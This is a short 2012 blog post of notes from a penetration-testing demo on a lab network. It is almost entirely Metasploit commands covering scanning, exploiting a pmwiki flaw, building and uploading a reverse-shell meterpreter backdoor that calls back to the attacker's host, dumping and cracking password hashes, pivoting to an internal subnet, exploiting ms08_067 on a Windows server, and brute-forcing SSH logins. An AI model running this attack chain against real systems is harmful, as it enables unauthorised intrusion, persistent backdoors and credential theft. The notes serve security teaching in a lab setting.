Tuesday, 15 May 2012

UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 172.16.128.1/24 
  • Find attacks
  • Visit site (http://172.16.128.3) and attack
  • Exploit using CVE-2011-4453  (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost 172.16.128.3
exploit -j
sessions -v
  • Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=172.16.128.10 LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
<?php
system("runme.exe");
?>
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost 172.16.128.10
set lport 8443
exploit -j
  • Open a Terminal and
wget http://172.16.128.3/meh.php
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 10.1.87.1 255.255.255.0 2
  • Scan subnet using arpscan
run arp_scanner -r 10.1.87.1/24
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 10.1.87.4
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r 10.1.87.5
  • Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
set RHOSTS 10.1.87.5
run -j

Thats all for now..
Stay tuned :)

No comments:

Post a Comment